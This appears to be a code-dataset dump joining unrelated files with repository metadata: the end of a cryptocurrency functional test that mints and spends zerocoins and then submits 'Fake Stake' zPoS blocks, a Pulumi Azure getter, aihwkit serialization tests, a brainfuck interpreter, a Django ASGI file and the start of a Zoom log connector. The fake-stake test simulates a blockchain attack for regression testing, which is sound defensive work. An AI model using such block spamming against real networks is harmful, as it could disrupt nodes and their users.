MORE_MINED_BLOCKS = 301 # More blocks mined before spending zerocoins
self.NUM_BLOCKS = 2 # Number of spammed blocks
# 1) Starting mining blocks
self.log.info("Mining %d blocks to get to zPOS activation...." % INITAL_MINED_BLOCKS)
self.node.generate(INITAL_MINED_BLOCKS)
sleep(2)
# 2) Collect the possible prevouts and mint zerocoins with those
self.log.info("Collecting all unspent coins which we generated from mining...")
balance = self.node.getbalance("*", 100)
self.log.info("Minting zerocoins...")
initial_mints = 0
while balance > DENOM_TO_USE:
try:
self.node.mintzerocoin(DENOM_TO_USE)
except JSONRPCException:
break
sleep(1)
initial_mints += 1
self.node.generate(1)
sleep(1)
if initial_mints % 5 == 0:
self.log.info("Minted %d coins" % initial_mints)
if initial_mints >= 70:
break
balance = self.node.getbalance("*", 100)
self.log.info("Minted %d coins in the %d-denom, remaining balance %d", initial_mints, DENOM_TO_USE, balance)
sleep(2)
# 3) mine more blocks
self.log.info("Mining %d more blocks ... and getting spendable zerocoins" % MORE_MINED_BLOCKS)
self.node.generate(MORE_MINED_BLOCKS)
sleep(2)
mints = self.node.listmintedzerocoins(True, True)
mints_hashes = [x["serial hash"] for x in mints]
# This mints are not ready spendable, only few of them.
self.log.info("Got %d confirmed mints" % len(mints_hashes))
# 4) spend mints
self.log.info("Spending mints in block %d..." % self.node.getblockcount())
spends = 0
spent_mints = []
for mint in mints_hashes:
# create a single element list to pass to RPC spendzerocoinmints
mint_arg = []
mint_arg.append(mint)
try:
self.node.spendzerocoinmints(mint_arg)
sleep(1)
spends += 1
spent_mints.append(mint)
except JSONRPCException as e:
self.log.warning(str(e))
continue
sleep(1)
self.log.info("Successfully spent %d mints" % spends)
# 5) Start mining again so that spends get confirmed in a block.
self.log.info("Mining 5 more blocks...")
self.node.generate(5)
sleep(2)
# 6) Collect some prevouts for random txes
self.log.info("Collecting inputs for txes...")
spending_utxo_list = self.node.listunspent()
sleep(1)
# 7) Create "Fake Stake" blocks and send them
self.log.info("Creating Fake stake zPoS blocks...")
err_msgs = self.test_spam("Main", mints, spending_utxo_list=spending_utxo_list, fZPoS=True)
if not len(err_msgs) == 0:
self.log.error("result: " + " | ".join(err_msgs))
raise AssertionError("TEST FAILED")
self.log.info("%s PASSED" % self.__class__.__name__)
if __name__ == '__main__':
zPoSFakeStake().main()
| 37.588785
| 136
| 0.618846
|
f042407c11c1bc588dc2a12b65909abd5dfb47a4
| 4,913
|
py
|
Python
|
sdk/python/pulumi_azure_native/documentdb/v20191212/get_sql_resource_sql_database.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/documentdb/v20191212/get_sql_resource_sql_database.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/documentdb/v20191212/get_sql_resource_sql_database.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetSqlResourceSqlDatabaseResult',
'AwaitableGetSqlResourceSqlDatabaseResult',
'get_sql_resource_sql_database',
]
@pulumi.output_type
class GetSqlResourceSqlDatabaseResult:
"""
An Azure Cosmos DB SQL database.
"""
def __init__(__self__, id=None, location=None, name=None, resource=None, tags=None, type=None):
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if resource and not isinstance(resource, dict):
raise TypeError("Expected argument 'resource' to be a dict")
pulumi.set(__self__, "resource", resource)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def id(self) -> str:
"""
The unique resource identifier of the ARM resource.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def location(self) -> Optional[str]:
"""
The location of the resource group to which the resource belongs.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the ARM resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def resource(self) -> Optional['outputs.SqlDatabaseGetPropertiesResponseResource']:
return pulumi.get(self, "resource")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Tags are a list of key-value pairs that describe the resource. These tags can be used in viewing and grouping this resource (across resource groups). A maximum of 15 tags can be provided for a resource. Each tag must have a key no greater than 128 characters and value no greater than 256 characters. For example, the default experience for a template type is set with "defaultExperience": "Cassandra". Current "defaultExperience" values also include "Table", "Graph", "DocumentDB", and "MongoDB".
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
"""
The type of Azure resource.
"""
return pulumi.get(self, "type")
class AwaitableGetSqlResourceSqlDatabaseResult(GetSqlResourceSqlDatabaseResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetSqlResourceSqlDatabaseResult(
id=self.id,
location=self.location,
name=self.name,
resource=self.resource,
tags=self.tags,
type=self.type)
def get_sql_resource_sql_database(account_name: Optional[str] = None,
database_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetSqlResourceSqlDatabaseResult:
"""
An Azure Cosmos DB SQL database.
:param str account_name: Cosmos DB database account name.
:param str database_name: Cosmos DB database name.
:param str resource_group_name: Name of an Azure resource group.
"""
__args__ = dict()
__args__['accountName'] = account_name
__args__['databaseName'] = database_name
__args__['resourceGroupName'] = resource_group_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:documentdb/v20191212:getSqlResourceSqlDatabase', __args__, opts=opts, typ=GetSqlResourceSqlDatabaseResult).value
return AwaitableGetSqlResourceSqlDatabaseResult(
id=__ret__.id,
location=__ret__.location,
name=__ret__.name,
resource=__ret__.resource,
tags=__ret__.tags,
type=__ret__.type)
| 37.219697
| 505
| 0.65113
|
d93b19b41e62c991ed4f600393fd0c2c3ec7da00
| 23,640
|
py
|
Python
|
tests/test_utils.py
|
portoise-yin/aihwkit
|
856530f7d782046fb094d1dc6ce5d9ce0159d8ff
|
[
"Apache-2.0"
] | null | null | null |
tests/test_utils.py
|
portoise-yin/aihwkit
|
856530f7d782046fb094d1dc6ce5d9ce0159d8ff
|
[
"Apache-2.0"
] | null | null | null |
tests/test_utils.py
|
portoise-yin/aihwkit
|
856530f7d782046fb094d1dc6ce5d9ce0159d8ff
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# (C) Copyright 2020, 2021 IBM. All Rights Reserved.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Test for different utility functionality."""
from tempfile import TemporaryFile
from copy import deepcopy
from unittest import SkipTest
from numpy import array
from numpy.random import rand
from numpy.testing import assert_array_almost_equal, assert_raises
from torch import Tensor, load, save, device, manual_seed
from torch.nn import Module, Sequential
from torch.nn import Linear as torch_linear
from torch.nn.functional import mse_loss
from torch.optim import SGD
from aihwkit.nn import AnalogConv2d, AnalogSequential
from aihwkit.optim import AnalogSGD
from aihwkit.simulator.configs import SingleRPUConfig, FloatingPointRPUConfig
from aihwkit.simulator.configs.devices import ConstantStepDevice, LinearStepDevice
from aihwkit.simulator.configs.utils import IOParameters, UpdateParameters
from aihwkit.simulator.rpu_base import cuda
from aihwkit.exceptions import TileError, ModuleError
from aihwkit.nn.conversion import convert_to_analog
from .helpers.decorators import parametrize_over_layers
from .helpers.layers import Conv2d, Conv2dCuda, Linear, LinearCuda
from .helpers.testcases import ParametrizedTestCase
from .helpers.tiles import FloatingPoint, ConstantStep, Inference
@parametrize_over_layers(
layers=[Linear, Conv2d, LinearCuda, Conv2dCuda],
tiles=[FloatingPoint, ConstantStep, Inference],
biases=[True, False]
)
class SerializationTest(ParametrizedTestCase):
"""Tests for serialization."""
@staticmethod
def train_model(model, loss_func, x_b, y_b):
"""Train the model."""
opt = AnalogSGD(model.parameters(), lr=0.5)
opt.regroup_param_groups(model)
epochs = 1
for _ in range(epochs):
pred = model(x_b)
loss = loss_func(pred, y_b)
loss.backward()
opt.step()
opt.zero_grad()
@staticmethod
def get_layer_and_tile_weights(model):
"""Return the weights and biases of the model and the tile."""
weight = model.weight.data.detach().cpu().numpy()
if model.use_bias:
bias = model.bias.data.detach().cpu().numpy()
else:
bias = None
analog_weight, analog_bias = model.analog_tile.get_weights()
analog_weight = analog_weight.detach().cpu().numpy().reshape(weight.shape)
if model.use_bias:
analog_bias = analog_bias.detach().cpu().numpy()
else:
analog_bias = None
return weight, bias, analog_weight, analog_bias
def test_save_load_state_dict_train(self):
"""Test saving and loading using a state dict after training."""
model = self.get_layer()
# Perform an update in order to modify tile weights and biases.
loss_func = mse_loss
if isinstance(model, AnalogConv2d):
input_x = Tensor(rand(2, 2, 3, 3))*0.2
input_y = Tensor(rand(2, 3, 4, 4))*0.2
else:
input_x = Tensor(rand(2, model.in_features))*0.2
input_y = Tensor(rand(2, model.out_features))*0.2
if self.use_cuda:
input_x = input_x.cuda()
input_y = input_y.cuda()
self.train_model(model, loss_func, input_x, input_y)
# Keep track of the current weights and biases for comparing.
(model_weights, model_biases,
tile_weights, tile_biases) = self.get_layer_and_tile_weights(model)
# now the tile weights should be out of sync
assert_raises(AssertionError, assert_array_almost_equal, model_weights, tile_weights)
if self.bias:
assert_raises(AssertionError, assert_array_almost_equal, model_biases, tile_biases)
# Save the model to a file.
with TemporaryFile() as file:
save(model.state_dict(), file)
# Create a new model and load its state dict.
file.seek(0)
new_model = self.get_layer()
new_model.load_state_dict(load(file))
# Compare the new model weights and biases. they should now be in sync
(new_model_weights, new_model_biases,
new_tile_weights, new_tile_biases) = self.get_layer_and_tile_weights(new_model)
assert_array_almost_equal(tile_weights, new_model_weights)
assert_array_almost_equal(tile_weights, new_tile_weights)
if self.bias:
assert_array_almost_equal(tile_biases, new_model_biases)
assert_array_almost_equal(tile_biases, new_tile_biases)
def test_save_load_model(self):
"""Test saving and loading a model directly."""
model = self.get_layer()
# Keep track of the current weights and biases for comparing.
(model_weights, model_biases,
tile_weights, tile_biases) = self.get_layer_and_tile_weights(model)
assert_array_almost_equal(model_weights, tile_weights)
if self.bias:
assert_array_almost_equal(model_biases, tile_biases)
# Save the model to a file.
with TemporaryFile() as file:
save(model, file)
# Load the model.
file.seek(0)
new_model = load(file)
# Compare the new model weights and biases.
(new_model_weights, new_model_biases,
new_tile_weights, new_tile_biases) = self.get_layer_and_tile_weights(new_model)
assert_array_almost_equal(model_weights, new_model_weights)
assert_array_almost_equal(tile_weights, new_tile_weights)
if self.bias:
assert_array_almost_equal(model_biases, new_model_biases)
assert_array_almost_equal(tile_biases, new_tile_biases)
# Asserts over the AnalogContext of the new model.
self.assertTrue(hasattr(new_model.analog_tile.analog_ctx, 'analog_tile'))
self.assertIsInstance(new_model.analog_tile.analog_ctx.analog_tile,
model.analog_tile.__class__)
self.assertTrue(new_model.analog_tile.is_cuda == model.analog_tile.is_cuda)
def test_save_load_model_cross_device(self):
"""Test saving and loading a model directly."""
if not cuda.is_compiled():
raise SkipTest('CUDA not available.')
model = self.get_layer()
map_location = 'cuda'
if model.analog_tile.is_cuda:
map_location = 'cpu'
# Keep track of the current weights and biases for comparing.
(model_weights, model_biases,
tile_weights, tile_biases) = self.get_layer_and_tile_weights(model)
assert_array_almost_equal(model_weights, tile_weights)
if self.bias:
assert_array_almost_equal(model_biases, tile_biases)
# Save the model to a file.
with TemporaryFile() as file:
save(model, file)
# Load the model.
file.seek(0)
new_model = load(file, map_location=device(map_location))
# Compare the new model weights and biases.
(new_model_weights, new_model_biases,
new_tile_weights, new_tile_biases) = self.get_layer_and_tile_weights(new_model)
assert_array_almost_equal(model_weights, new_model_weights)
assert_array_almost_equal(tile_weights, new_tile_weights)
if self.bias:
assert_array_almost_equal(model_biases, new_model_biases)
assert_array_almost_equal(tile_biases, new_tile_biases)
# Asserts over the AnalogContext of the new model.
self.assertTrue(hasattr(new_model.analog_tile.analog_ctx, 'analog_tile'))
self.assertIsInstance(new_model.analog_tile.analog_ctx.analog_tile,
model.analog_tile.__class__)
self.assertTrue(new_model.analog_tile.is_cuda != model.analog_tile.is_cuda)
if model.analog_tile.shared_weights is not None:
self.assertTrue(new_model.analog_tile.shared_weights.device.type == map_location)
def test_save_load_meta_parameter(self):
"""Test saving and loading a device with custom parameters."""
# Create the device and the array.
rpu_config = SingleRPUConfig(
forward=IOParameters(inp_noise=0.321),
backward=IOParameters(inp_noise=0.456),
update=UpdateParameters(desired_bl=78),
device=ConstantStepDevice(w_max=0.987)
)
model = self.get_layer(rpu_config=rpu_config)
# Save the model to a file.
with TemporaryFile() as file:
save(model, file)
# Load the model.
file.seek(0)
new_model = load(file)
# Assert over the new model tile parameters.
parameters = new_model.analog_tile.tile.get_parameters()
self.assertAlmostEqual(parameters.forward_io.inp_noise, 0.321)
self.assertAlmostEqual(parameters.backward_io.inp_noise, 0.456)
self.assertAlmostEqual(parameters.update.desired_bl, 78)
self.assertTrue(new_model.analog_tile.is_cuda == model.analog_tile.is_cuda)
def test_save_load_hidden_parameters(self):
"""Test saving and loading a device with hidden parameters."""
# Create the device and the array.
model = self.get_layer()
hidden_parameters = model.analog_tile.tile.get_hidden_parameters()
# Save the model to a file.
with TemporaryFile() as file:
save(model, file)
# Load the model.
file.seek(0)
new_model = load(file)
# Assert over the new model tile parameters.
new_hidden_parameters = new_model.analog_tile.tile.get_hidden_parameters()
assert_array_almost_equal(hidden_parameters, new_hidden_parameters)
def test_save_load_alpha_scale(self):
"""Test saving and loading a device with alpha_scale."""
# Create the device and the array.
model = self.get_layer()
alpha = 2.0
model.analog_tile.tile.set_alpha_scale(alpha)
# Save the model to a file.
with TemporaryFile() as file:
save(model, file)
# Load the model.
file.seek(0)
new_model = load(file)
# Assert over the new model tile parameters.
alpha_new = new_model.analog_tile.tile.get_alpha_scale()
assert_array_almost_equal(array(alpha), array(alpha_new))
def test_save_load_shared_weights(self):
"""Test saving and loading a device with shared_weights."""
if isinstance(self.get_rpu_config(), FloatingPointRPUConfig):
raise SkipTest('Not available for FP')
# Create the device and the array.
model = self.get_layer()
shared_weights = None
if model.analog_tile.shared_weights is not None:
shared_weights = model.analog_tile.shared_weights.detach().cpu().numpy()
# Save the model to a file.
with TemporaryFile() as file:
save(model, file)
# Load the model.
file.seek(0)
new_model = load(file)
# Assert over the new model tile parameters.
if shared_weights is not None:
new_shared_weights = new_model.analog_tile.shared_weights
assert_array_almost_equal(shared_weights, new_shared_weights.detach().cpu().numpy())
def test_save_load_weight_scaling_omega(self):
"""Test saving and loading a device with weight scaling omega."""
model = self.get_layer(weight_scaling_omega=0.5)
alpha = model.analog_tile.tile.get_alpha_scale()
self.assertNotEqual(alpha, 1.0)
# Save the model to a file.
with TemporaryFile() as file:
save(model, file)
# Load the model.
file.seek(0)
new_model = load(file)
# Assert over the new model tile parameters.
alpha_new = new_model.analog_tile.tile.get_alpha_scale()
assert_array_almost_equal(array(alpha), array(alpha_new))
def test_save_load_state_dict_hidden_parameters(self):
"""Test saving and loading via state_dict with hidden parameters."""
# Create the device and the array.
model = self.get_layer()
hidden_parameters = model.analog_tile.tile.get_hidden_parameters()
# Save the model to a file.
with TemporaryFile() as file:
save(model.state_dict(), file)
# Load the model.
file.seek(0)
new_model = self.get_layer()
new_model.load_state_dict(load(file))
# Assert over the new model tile parameters.
new_hidden_parameters = new_model.analog_tile.tile.get_hidden_parameters()
assert_array_almost_equal(hidden_parameters, new_hidden_parameters)
def test_state_dict_children_layers_sequential(self):
"""Test using the state_dict with children analog layers via Sequential."""
children_layer = self.get_layer()
model = Sequential(children_layer)
# Keep track of the current weights and biases for comparing.
(model_weights, model_biases,
tile_weights, tile_biases) = self.get_layer_and_tile_weights(children_layer)
self.assertIn('0.analog_tile_state', model.state_dict())
# Update the state_dict of a new model.
new_children_layer = self.get_layer()
new_model = Sequential(new_children_layer)
new_model.load_state_dict(model.state_dict())
# Compare the new model weights and biases.
(new_model_weights, new_model_biases, new_tile_weights, new_tile_biases) = \
self.get_layer_and_tile_weights(new_children_layer)
assert_array_almost_equal(model_weights, new_model_weights)
assert_array_almost_equal(tile_weights, new_tile_weights)
if self.bias:
assert_array_almost_equal(model_biases, new_model_biases)
assert_array_almost_equal(tile_biases, new_tile_biases)
def test_state_dict_children_layers_subclassing(self):
"""Test using the state_dict with children analog layers via subclassing."""
class CustomModule(Module):
"""Module that defines its children layers via custom attributes."""
# pylint: disable=abstract-method
def __init__(self, layer: Module):
super().__init__()
self.custom_child = layer
children_layer = self.get_layer()
model = CustomModule(children_layer)
# Keep track of the current weights and biases for comparing.
(model_weights, model_biases, tile_weights, tile_biases) = \
self.get_layer_and_tile_weights(children_layer)
self.assertIn('custom_child.analog_tile_state', model.state_dict())
# Update the state_dict of a new model.
new_children_layer = self.get_layer()
new_model = CustomModule(new_children_layer)
new_model.load_state_dict(model.state_dict())
# Compare the new model weights and biases.
(new_model_weights, new_model_biases, new_tile_weights, new_tile_biases) = \
self.get_layer_and_tile_weights(new_children_layer)
assert_array_almost_equal(model_weights, new_model_weights)
assert_array_almost_equal(tile_weights, new_tile_weights)
if self.bias:
assert_array_almost_equal(model_biases, new_model_biases)
assert_array_almost_equal(tile_biases, new_tile_biases)
def test_state_dict_analog_strict(self):
"""Test the `strict` flag for analog layers."""
model = self.get_layer()
state_dict = model.state_dict()
# Remove the analog key from the state dict.
del state_dict['analog_tile_state']
# Check that it fails when using `strict`.
with self.assertRaises(RuntimeError) as context:
model.load_state_dict(state_dict, strict=True)
self.assertIn('Missing key', str(context.exception))
# Check that it passes when not using `strict`.
model.load_state_dict(state_dict, strict=False)
def test_state_dict(self):
"""Test creating a new model using a state dict, without saving to disk."""
model = self.get_layer()
state_dict = model.state_dict()
new_model = self.get_layer()
new_model.load_state_dict(state_dict)
# Asserts over the AnalogContext of the new model.
self.assertTrue(hasattr(new_model.analog_tile.analog_ctx, 'analog_tile'))
self.assertIsInstance(new_model.analog_tile.analog_ctx.analog_tile,
model.analog_tile.__class__)
def test_hidden_parameter_mismatch(self):
"""Test for error if tile structure mismatches."""
model = self.get_layer()
state_dict = model.state_dict()
# Create the device and the array.
rpu_config = SingleRPUConfig(
device=LinearStepDevice() # different hidden structure
)
new_model = self.get_layer(rpu_config=rpu_config)
if new_model.analog_tile.__class__.__name__ != model.analog_tile.__class__.__name__:
with self.assertRaises(TileError):
self.assertRaises(new_model.load_state_dict(state_dict))
def test_load_state_load_rpu_config(self):
"""Test creating a new model using a state dict, while using a different RPU config."""
# Create the device and the array.
rpu_config_org = self.get_rpu_config()
# Skipped for FP
if isinstance(rpu_config_org, FloatingPointRPUConfig):
raise SkipTest('Not available for FP')
rpu_config_org.forward.is_perfect = False
old_value = 0.11
rpu_config_org.forward.inp_noise = old_value
model = self.get_layer(rpu_config=rpu_config_org)
state_dict = model.state_dict()
rpu_config = deepcopy(rpu_config_org)
new_value = 0.51
rpu_config.forward.inp_noise = new_value
# Test restore_rpu_config=False
new_model = self.get_layer(rpu_config=rpu_config)
new_model.load_state_dict(state_dict, load_rpu_config=False)
parameters = new_model.analog_tile.tile.get_parameters()
self.assertAlmostEqual(parameters.forward_io.inp_noise, new_value)
# Test restore_rpu_config=True
new_model = self.get_layer(rpu_config=rpu_config)
new_model.load_state_dict(state_dict, load_rpu_config=True)
parameters = new_model.analog_tile.tile.get_parameters()
self.assertAlmostEqual(parameters.forward_io.inp_noise, old_value)
def test_load_state_load_rpu_config_sequential(self):
"""Test creating a new model using a state dict, while using a different RPU config."""
# Create the device and the array.
rpu_config_org = self.get_rpu_config()
# Skipped for FP
if isinstance(rpu_config_org, FloatingPointRPUConfig):
raise SkipTest('Not available for FP')
rpu_config_org.forward.is_perfect = False
old_value = 0.11
rpu_config_org.forward.inp_noise = old_value
model = AnalogSequential(self.get_layer(rpu_config=rpu_config_org))
state_dict = model.state_dict()
rpu_config = deepcopy(rpu_config_org)
new_value = 0.51
rpu_config.forward.inp_noise = new_value
# Test restore_rpu_config=False
new_model = AnalogSequential(self.get_layer(rpu_config=rpu_config))
new_model.load_state_dict(state_dict, load_rpu_config=False)
parameters = new_model[0].analog_tile.tile.get_parameters()
self.assertAlmostEqual(parameters.forward_io.inp_noise, new_value)
# Test restore_rpu_config=True
new_model = AnalogSequential(self.get_layer(rpu_config=rpu_config))
new_model.load_state_dict(state_dict, load_rpu_config=True)
parameters = new_model[0].analog_tile.tile.get_parameters()
self.assertAlmostEqual(parameters.forward_io.inp_noise, old_value)
def test_load_state_load_rpu_config_wrong(self):
"""Test creating a new model using a state dict, while using a different RPU config."""
# Skipped for FP
if isinstance(self.get_rpu_config(), FloatingPointRPUConfig):
raise SkipTest('Not available for FP')
# Create the device and the array.
model = self.get_layer()
state_dict = model.state_dict()
rpu_config = FloatingPointRPUConfig()
new_model = self.get_layer(rpu_config=rpu_config)
assert_raises(ModuleError, new_model.load_state_dict, state_dict, load_rpu_config=False)
@parametrize_over_layers(
layers=[Linear, LinearCuda],
tiles=[FloatingPoint],
biases=[False]
)
class SerializationTestExtended(ParametrizedTestCase):
"""Tests for serialization."""
@staticmethod
def train_model_torch(model, loss_func, x_b, y_b):
"""Train the model with torch SGD."""
opt = SGD(model.parameters(), lr=0.5)
epochs = 100
for _ in range(epochs):
opt.zero_grad()
pred = model(x_b)
loss = loss_func(pred, y_b)
loss.backward()
opt.step()
@staticmethod
def get_torch_model(use_cuda: bool):
""" Returns a torch model."""
manual_seed(4321)
torch_model = Sequential(
torch_linear(4, 3),
torch_linear(3, 3),
Sequential(
torch_linear(3, 1),
torch_linear(1, 1)
)
)
if use_cuda:
torch_model.cuda()
return torch_model
def test_load_state_dict_conversion(self):
"""Test loading and setting conversion with alpha."""
# Create the device and the array.
x_b = Tensor([[0.1, 0.2, 0.3, 0.4], [0.2, 0.4, 0.3, 0.1]])
y_b = Tensor([[0.3], [0.6]])
if self.use_cuda:
x_b = x_b.cuda()
y_b = y_b.cuda()
model = self.get_torch_model(self.use_cuda)
self.train_model_torch(model, mse_loss, x_b, y_b)
analog_model = convert_to_analog(model, self.get_rpu_config(), weight_scaling_omega=1.0)
analog_loss = mse_loss(analog_model(x_b), y_b)
with TemporaryFile() as file:
save(analog_model.state_dict(), file)
# Load the model.
file.seek(0)
model = self.get_torch_model(self.use_cuda)
new_analog_model = convert_to_analog(model, self.get_rpu_config(),
weight_scaling_omega=1.0)
state_dict = load(file)
new_analog_model.load_state_dict(state_dict, load_rpu_config=True)
new_state_dict = new_analog_model.state_dict()
for key in new_state_dict.keys():
if not key.endswith('analog_tile_state'):
continue
state1 = new_state_dict[key]
state2 = state_dict[key]
assert_array_almost_equal(state1['analog_tile_weights'],
state2['analog_tile_weights'])
assert_array_almost_equal(state1['analog_alpha_scale'],
state2['analog_alpha_scale'])
new_analog_loss = mse_loss(new_analog_model(x_b), y_b)
self.assertTensorAlmostEqual(new_analog_loss, analog_loss)
| 39.20398
| 96
| 0.669712
|
58bb506593c3ae35a98974a457423ccd5ad968e8
| 3,432
|
py
|
Python
|
main.py
|
loadedice/brainfuck
|
2d069ed54deb5fcae317ff0797568206a050f71f
|
[
"MIT"
] | 1
|
2017-03-17T17:14:35.000Z
|
2017-03-17T17:14:35.000Z
|
main.py
|
loadedice/brainfuck
|
2d069ed54deb5fcae317ff0797568206a050f71f
|
[
"MIT"
] | null | null | null |
main.py
|
loadedice/brainfuck
|
2d069ed54deb5fcae317ff0797568206a050f71f
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
from sys import stderr, stdin, argv
from ctypes import c_ubyte
def bf_parse(program, strict=False):
"""
Takes a brainfuck string, if strict == True checks that it's all valid brainfuck
returns a dictionary to help deal with jumping around in the program
I had other ideas about how to do this, but this was the easiest to do
and I think it's kinda nice but also not very efficient in terms of memory usage
If you can't tell I'm just playing by ear here and things are probably not very good.
"""
stack = []
jump_dict = {}
for position, symbol in enumerate(program):
if symbol == '[':
stack.append(position)
elif symbol == ']':
if len(stack) == 0:
raise SyntaxError("`[` at character {p} does not have a corresponding `[`".format(p=position))
destination = stack.pop()
# Because we may need to jump back up to the '[' to check the condition to see if we need to jump out
# This could probably be done with a stack in the bf_eval function. Oh well.
jump_dict[position] = destination
jump_dict[destination] = position
elif strict and symbol not in "><+-.,":
raise SyntaxError("`{s}` at character {p} is not a valid brainfuck symbol".format(s=symbol, p=position))
if len(stack) != 0:
raise SyntaxError("Square brackets are not balanced")
return jump_dict
def bf_eval(program, memory_size=30000):
"""
Takes brainfuck string and evaluates it.
each cell is fixed at being 8 bits
memory_size defines how many cells there are in memory
"""
jump_dict = bf_parse(program)
data = [c_ubyte(0) for _ in range(memory_size)] # Memory
data_pointer = 0 # index in the memory
program_counter = 0 # index in the program
while program_counter < len(program):
symbol = program[program_counter]
# Because Python lets you index arrays with negative indices...
if 0 > data_pointer or 0 > program_counter:
raise IndexError("Index out of bounds")
if symbol == '>':
data_pointer += 1
elif symbol == '<':
data_pointer -= 1
elif symbol == '+':
data[data_pointer].value += 1
elif symbol == '-':
data[data_pointer].value -= 1
elif symbol == '.':
print(chr(data[data_pointer].value), end='')
elif symbol == ',':
char = stdin.read(1)
# If we read an empty string then make it 0
if char == '':
char = '\0'
data[data_pointer] = c_ubyte(ord(char))
elif symbol == '[':
# If it is false then jump to the end.
# the program counter will be incremented after this block
if not data[data_pointer]:
program_counter = jump_dict[program_counter]
elif symbol == ']':
program_counter = jump_dict[program_counter]
continue
program_counter += 1
print()
def main():
if len(argv) > 2:
print("Usage: {} [path to file]".format(argv[0]), file=stderr)
return
elif len(argv) == 2:
with open(argv[1], 'r') as f:
program = f.read().strip()
else:
program = input("Enter the brainfuck program: ")
bf_eval(program)
if __name__ == '__main__':
main()
| 33.980198
| 116
| 0.593823
|
862b07a91d738f63686acb639bcf957e6e778b47
| 381
|
py
|
Python
|
ML/ML/asgi.py
|
Nagababu91768/house-price-prediction-ml-app
|
5a7a1e3b6306359f96ed1d9ff7f6ed558d9d3926
|
[
"MIT"
] | null | null | null |
ML/ML/asgi.py
|
Nagababu91768/house-price-prediction-ml-app
|
5a7a1e3b6306359f96ed1d9ff7f6ed558d9d3926
|
[
"MIT"
] | null | null | null |
ML/ML/asgi.py
|
Nagababu91768/house-price-prediction-ml-app
|
5a7a1e3b6306359f96ed1d9ff7f6ed558d9d3926
|
[
"MIT"
] | null | null | null |
"""
ASGI config for ML project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ML.settings')
application = get_asgi_application()
| 22.411765
| 78
| 0.779528
|
2c1d1e59ae4fde16cf4f162fca6b47280bd15e85
| 9,350
|
py
|
Python
|
DataConnectors/ZoomReports/ZoomSentinelConnector/__init__.py
|
johnbilliris/Azure-Sentinel
|
ef3c2e3919023e80e15a94544e06e37623e7c1d3
|
[
"MIT"
] | 2,227
|
2019-02-25T09:34:46.000Z
|
2022-03-31T21:30:59.000Z
|
DataConnectors/ZoomReports/ZoomSentinelConnector/__init__.py
|
johnbilliris/Azure-Sentinel
|
ef3c2e3919023e80e15a94544e06e37623e7c1d3
|
[
"MIT"
] | 1,728
|
2019-02-25T17:18:16.000Z
|
2022-03-31T23:49:18.000Z
|
DataConnectors/ZoomReports/ZoomSentinelConnector/__init__.py
|
johnbilliris/Azure-Sentinel
|
ef3c2e3919023e80e15a94544e06e37623e7c1d3
|
[
"MIT"
] | 1,624
|
2019-02-28T16:17:38.000Z
|
2022-03-31T18:00:02.000Z
|
import azure.functions as func
import jwt
import datetime
import json
import base64
import hashlib
import hmac
import requests
import re
import os
import logging
from .state_manager import StateManager
jwt_api_key = os.environ['ZoomApiKey']
jwt_api_secret = os.environ['ZoomApiSecret']
customer_id = os.environ['WorkspaceID']
shared_key = os.environ['WorkspaceKey']
connection_string = os.environ['AzureWebJobsStorage']
logAnalyticsUri = os.environ.get('logAnalyticsUri')
table_name = "Zoom"
chunksize = 10000
if ((logAnalyticsUri in (None, '') or str(logAnalyticsUri).isspace())):
logAnalyticsUri = 'https://' + customer_id + '.ods.opinsights.azure.com'
pattern = r'https:\/\/([\w\-]+)\.ods\.opinsights\.azure.([a-zA-Z\.]+)$'
match = re.match(pattern,str(logAnalyticsUri))
if(not match):
raise Exception("Zoom: Invalid Log Analytics Uri.")
class Zoom:
def __init__(self):
self.api_key = jwt_api_key
self.api_secret = jwt_api_secret
self.base_url = "https://api.zoom.us/v2"
self.jwt_token_exp_hours = 1
self.jwt_token = self.generate_jwt_token()
self.from_day,self.to_day = self.generate_date()
self.headers = {
'Accept': 'application/json',
'authorization': "Bearer " + self.jwt_token,
}
def generate_jwt_token(self):
payload = {
'iss': self.api_key,
